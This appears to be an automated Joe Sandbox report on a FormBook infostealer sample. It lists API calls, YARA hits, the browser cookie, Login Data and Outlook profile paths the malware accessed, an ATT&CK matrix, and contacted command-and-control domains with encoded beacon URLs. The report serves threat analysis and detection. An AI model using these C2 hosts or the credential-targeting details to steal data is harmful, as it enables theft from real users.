Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C11E06 GetUserNameW,

0_2_00C11E06

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C03F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00C03F3A

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BD49A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3913013738.0000000004080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2492972011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3912887466.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3915092997.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2493551934.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3911338713.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2494167980.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3913163573.0000000004220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: rACq8Eaix6.exe	Binary or memory string: WIN_81
Source: rACq8Eaix6.exe	Binary or memory string: WIN_XP
Source: rACq8Eaix6.exe	Binary or memory string: WIN_XPe
Source: rACq8Eaix6.exe	Binary or memory string: WIN_VISTA
Source: rACq8Eaix6.exe	Binary or memory string: WIN_7
Source: rACq8Eaix6.exe	Binary or memory string: WIN_8
Source: rACq8Eaix6.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3913013738.0000000004080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2492972011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3912887466.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3915092997.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2493551934.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3911338713.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2494167980.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3913163573.0000000004220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C46283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00C46283
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C46747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00C46747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rACq8Eaix6.exe	60%	Virustotal		Browse
rACq8Eaix6.exe	74%	ReversingLabs	Win32.Trojan.AutoitInject
rACq8Eaix6.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.n-vis.group/lqir/?oxIxzhP=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCwfZdncWlSOnlraFB/QZ6SGlkqJPU2RhLExK1aNqo6ZD2rg==&qHO8p=hd0DQ8	0%	Avira URL Cloud	safe
http://www.395608.men/vje0/	0%	Avira URL Cloud	safe
http://www.gkfundeis.net/zd1g/	0%	Avira URL Cloud	safe
http://www.losmason.shop/uktz/?oxIxzhP=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITkWdF4d9GHTGCKMj1pNCfIk9qc2JEKRZoPPtZrmwk1MspVw==&qHO8p=hd0DQ8	0%	Avira URL Cloud	safe
http://www.mindfulsteps.xyz/8hma/	0%	Avira URL Cloud	safe
http://www.holytur.net/oeev/	0%	Avira URL Cloud	safe
http://www.espiritismo.info/4knb/?oxIxzhP=kGhc8cujIy468LEjHl1Bq2PU7Nse09viwjWSLKXwC1cEp+jXGgMaezOIe4V7ze6PoEjekagOfdxn4kQRbl8p+V6gWBX36oJLUl4+OD7m+QqDQo/RbffNhAc3ONEmviUo1g==&qHO8p=hd0DQ8	0%	Avira URL Cloud	safe
http://www.losmason.shop/uktz/	0%	Avira URL Cloud	safe
http://www.incgruporxat.click/ryxy/	0%	Avira URL Cloud	safe
http://www.espiritismo.info/4knb/	0%	Avira URL Cloud	safe
http://www.gkfundeis.net/zd1g/?qHO8p=hd0DQ8&oxIxzhP=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysilDdp5xTdm5FiVTX/I7wXG7gTv5deuaYX5Iiu5CYwfmrvg==	0%	Avira URL Cloud	safe
http://www.dialagiaja18.buzz/o7bo/	0%	Avira URL Cloud	safe
http://www.mindfulsteps.xyz	0%	Avira URL Cloud	safe
http://www.holytur.net/oeev/?qHO8p=hd0DQ8&oxIxzhP=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFohqWBpxtD+TNClFTqWC2kNfadr7DAmi0av5IfLKJZURhNQ==	0%	Avira URL Cloud	safe
http://www.lirio.shop/qp0h/	0%	Avira URL Cloud	safe
http://www.incgruporxat.click/ryxy/?oxIxzhP=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EJfEwK8gAHnNBpCw6WHIh95k49XlXigw3fJVZK11ld5a0iw==&qHO8p=hd0DQ8	0%	Avira URL Cloud	safe
http://www.395608.men/vje0/?oxIxzhP=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFBrdsgaecL8wXZcPHmyvVDo/vbTD/8GqtNcyVsEL78fmdJw==&qHO8p=hd0DQ8	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.n-vis.group	90.156.201.74	true	false	unknown
www.gkfundeis.net	62.116.130.8	true	false	unknown
5w23j7d4.n.fly8899.com	207.148.38.19	true	false	unknown
www.lirio.shop	13.248.169.48	true	false	unknown
www.mindfulsteps.xyz	199.192.23.123	true	true	unknown
dialagiaja18.buzz	66.29.148.78	true	false	unknown
www.losmason.shop	104.18.73.116	true	false	high
holytur.net	185.106.208.3	true	false	unknown
www.incgruporxat.click	104.21.88.139	true	false	unknown
espiritismo.info	3.33.130.190	true	false	unknown
www.395608.men	unknown	unknown	false	unknown
www.holytur.net	unknown	unknown	false	unknown
www.espiritismo.info	unknown	unknown	false	unknown
www.dialagiaja18.buzz	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.mindfulsteps.xyz/8hma/	false	Avira URL Cloud: safe	unknown
http://www.incgruporxat.click/ryxy/	false	Avira URL Cloud: safe	unknown
http://www.395608.men/vje0/	false	Avira URL Cloud: safe	unknown
http://www.losmason.shop/uktz/	true	Avira URL Cloud: safe	unknown
http://www.losmason.shop/uktz/?oxIxzhP=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITkWdF4d9GHTGCKMj1pNCfIk9qc2JEKRZoPPtZrmwk1MspVw==&qHO8p=hd0DQ8	true	Avira URL Cloud: safe	unknown
http://www.n-vis.group/lqir/?oxIxzhP=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCwfZdncWlSOnlraFB/QZ6SGlkqJPU2RhLExK1aNqo6ZD2rg==&qHO8p=hd0DQ8	false	Avira URL Cloud: safe	unknown
http://www.espiritismo.info/4knb/	false	Avira URL Cloud: safe	unknown
http://www.gkfundeis.net/zd1g/	false	Avira URL Cloud: safe	unknown
http://www.holytur.net/oeev/	false	Avira URL Cloud: safe	unknown
http://www.espiritismo.info/4knb/?oxIxzhP=kGhc8cujIy468LEjHl1Bq2PU7Nse09viwjWSLKXwC1cEp+jXGgMaezOIe4V7ze6PoEjekagOfdxn4kQRbl8p+V6gWBX36oJLUl4+OD7m+QqDQo/RbffNhAc3ONEmviUo1g==&qHO8p=hd0DQ8	false	Avira URL Cloud: safe	unknown
http://www.gkfundeis.net/zd1g/?qHO8p=hd0DQ8&oxIxzhP=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysilDdp5xTdm5FiVTX/I7wXG7gTv5deuaYX5Iiu5CYwfmrvg==	false	Avira URL Cloud: safe	unknown
http://www.dialagiaja18.buzz/o7bo/	false	Avira URL Cloud: safe	unknown
http://www.holytur.net/oeev/?qHO8p=hd0DQ8&oxIxzhP=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFohqWBpxtD+TNClFTqWC2kNfadr7DAmi0av5IfLKJZURhNQ==	false	Avira URL Cloud: safe	unknown
http://www.lirio.shop/qp0h/	false	Avira URL Cloud: safe	unknown
http://www.395608.men/vje0/?oxIxzhP=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFBrdsgaecL8wXZcPHmyvVDo/vbTD/8GqtNcyVsEL78fmdJw==&qHO8p=hd0DQ8	false	Avira URL Cloud: safe	unknown
http://www.incgruporxat.click/ryxy/?oxIxzhP=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EJfEwK8gAHnNBpCw6WHIh95k49XlXigw3fJVZK11ld5a0iw==&qHO8p=hd0DQ8	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/NVission	firefox.exe, 00000008.00000002.2786008912.000000003CE64000.00000004.80000000.00040000.00000000.sdmp	false		high
http://www.mindfulsteps.xyz	HSGhOUKfqFw.exe, 00000007.00000002.3915092997.000000000575F000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gmx.net/produkte/homepage-mail/homepage-parken/	msdt.exe, 00000005.00000002.3913942435.00000000054DC000.00000004.10000000.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3913197510.0000000003CFC000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msdt.exe, 00000005.00000003.2680760207.000000000753D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.73.116	www.losmason.shop	United States	13335	CLOUDFLARENETUS	false
90.156.201.74	www.n-vis.group	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
13.248.169.48	www.lirio.shop	United States	16509	AMAZON-02US	false
207.148.38.19	5w23j7d4.n.fly8899.com	Hong Kong	59371	DNC-ASDimensionNetworkCommunicationLimitedHK	false
104.21.88.139	www.incgruporxat.click	United States	13335	CLOUDFLARENETUS	false
199.192.23.123	www.mindfulsteps.xyz	United States	22612	NAMECHEAP-NETUS	true
62.116.130.8	www.gkfundeis.net	Germany	15456	INTERNETX-ASDE	false
185.106.208.3	holytur.net	Turkey	42846	GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTR	false
3.33.130.190	espiritismo.info	United States	8987	AMAZONEXPANSIONGB	false
66.29.148.78	dialagiaja18.buzz	United States	19538	ADVANTAGECOMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588973
Start date and time:	2025-01-11 07:57:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rACq8Eaix6.exe renamed because original name is a hash value
Original Sample Name:	004b01b19e0225e92388a04d9792240192952ef47f40679b71fbe6de33982f11.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@10/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 49 Number of non-executed functions: 274
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target HSGhOUKfqFw.exe, PID 3276 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.18.73.116	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	www.losmason.shop/s15n/
	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	www.losmason.shop/s15n/
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.losmason.shop/s15n/
	santi.exe	Get hash	malicious	FormBook	Browse	www.losmason.shop/uktz/
	http://www.toolfriendonline.com	Get hash	malicious	Unknown	Browse	www.toolfriendonline.com/
	http://nigoovip.com	Get hash	malicious	Unknown	Browse	nigoovip.com/
90.156.201.74	santi.exe	Get hash	malicious	FormBook	Browse
13.248.169.48	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	www.10000.space/3zfl/
	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	www.lovel.shop/rxts/
	PGK60fNNCZ.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.remedies.pro/a42x/
	zAg7xx1vKI.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	www.sfantulandrei.info/wvsm/
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	www.optimismbank.xyz/98j3/
	e47m9W6JGQ.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/wfhx/
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.autonomousoid.pro/m1if/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.lirio.shop	santi.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.losmason.shop	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	104.18.73.116
	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	104.18.73.116
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.18.73.116
	santi.exe	Get hash	malicious	FormBook	Browse	104.18.73.116
www.n-vis.group	santi.exe	Get hash	malicious	FormBook	Browse	90.156.201.74
5w23j7d4.n.fly8899.com	santi.exe	Get hash	malicious	FormBook	Browse	207.148.38.19
www.gkfundeis.net	santi.exe	Get hash	malicious	FormBook	Browse	62.116.130.8

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	fqbVL4XxCr.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
	JuIZye2xKX.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
MASTERHOST-ASMoscowRussiaRU	frosty.x86.elf	Get hash	malicious	Mirai	Browse	90.156.234.102
	Kloki.arm7.elf	Get hash	malicious	Unknown	Browse	83.222.6.30
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.18.36
	Kloki.x86_64.elf	Get hash	malicious	Unknown	Browse	83.222.30.186
	Kloki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.26.170
	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.4.239
	Kloki.spc.elf	Get hash	malicious	Unknown	Browse	83.222.13.30
	Kloki.arm5.elf	Get hash	malicious	Unknown	Browse	83.222.6.146
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	87.242.127.163
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	87.242.127.163
AMAZON-02US	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.130.71.34
	plZuPtZoTk.exe	Get hash	malicious	FormBook	Browse	54.67.87.110
	ARMV4L.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	wSoShbuXnJ.exe	Get hash	malicious	FormBook	Browse	3.252.97.86
	BLv4mI7zzY.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	4.elf	Get hash	malicious	Unknown	Browse	18.131.143.241
	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	PGK60fNNCZ.exe	Get hash	malicious	FormBook	Browse	13.248.169.48

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut2761.tmp

Download File

Process:	C:\Users\user\Desktop\rACq8Eaix6.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992759758340631
Encrypted:	true
SSDEEP:	6144:XQazfW8JrZXxLt0Y6Wna2K2E7HU4wlWzPUYKT7gLbti:XFzLJZXxTnTA0ADU/T74i
MD5:	621CCD2885F0CE400775A114A5ECB10F
SHA1:	51E8605CE22D018FD4B628A0E539343866CD153B
SHA-256:	9113137FE5486988CA18DBE2946F4A00501390DEA36D1BB22F220CE62C5B02E3
SHA-512:	5437D6E603E884CF1144C6D4558F75B0FDF1E0A650AC546F0959F61EDD124C923211115A2A75405F57DC624A4C90430DD3497C1D119A54B354FEFD408D239C11
Malicious:	false
Reputation:	low
Preview:	.m.L3I15K627..0I.5O627XLpI15O627XL0I15O627XL0I15O627XL0I15O6.7XL>V.;O.;.y.1....^[Dx<B&VG.[.T9"^&E.-S.E-". _..ya.5#T,.8B<.7XL0I1567;.e,W..U(..W?.*..uVU.B..U(.(...)V.._Q_e,W.15O627XL`.15.737n...15O627XL.I34D797X.4I15O627XLp\15O&27X<4I15.62'XL0K15I627XL0I75O627XL0955O427XL0I35..27HL0Y15O6"7X\0I15O6"7XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627v8U1E5O66e\L0Y15Ob67X\0I15O627XL0I15o62WXL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15